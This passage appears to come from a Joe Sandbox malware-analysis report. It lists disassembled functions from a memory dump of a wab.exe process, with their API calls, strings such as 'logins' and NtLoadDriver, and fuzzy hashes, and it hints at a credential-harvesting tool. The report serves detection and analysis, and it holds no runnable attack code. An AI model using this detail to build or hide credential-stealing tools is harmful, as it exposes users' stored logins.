                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                      • API String ID: 4054529287-3175352466
                                                                                                                                                                                                                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                      • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                      • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 667068680-2887671607
                                                                                                                                                                                                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                      • API String ID: 1607361635-601624466
                                                                                                                                                                                                                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                      • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1043902810-0
                                                                                                                                                                                                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                      • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                      • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                      • API String ID: 3330709923-517860148
                                                                                                                                                                                                                      • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                        • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                      • _wtoi.MSVCRT ref: 004081AF
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                      • String ID: logins$null
                                                                                                                                                                                                                      • API String ID: 3492182834-2163367763
                                                                                                                                                                                                                      • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004086DB
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004086FA
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID: ---
                                                                                                                                                                                                                      • API String ID: 3437578500-2854292027
                                                                                                                                                                                                                      • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1010922700-0
                                                                                                                                                                                                                      • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$FullNamePath$malloc$Version
                                                                                                                                                                                                                      • String ID: |A
                                                                                                                                                                                                                      • API String ID: 4233704886-1717621600
                                                                                                                                                                                                                      • Opcode ID: c2466c63737be692c3a7dfafc6e02f378046f46b324897726c23362a1a564614
                                                                                                                                                                                                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2466c63737be692c3a7dfafc6e02f378046f46b324897726c23362a1a564614
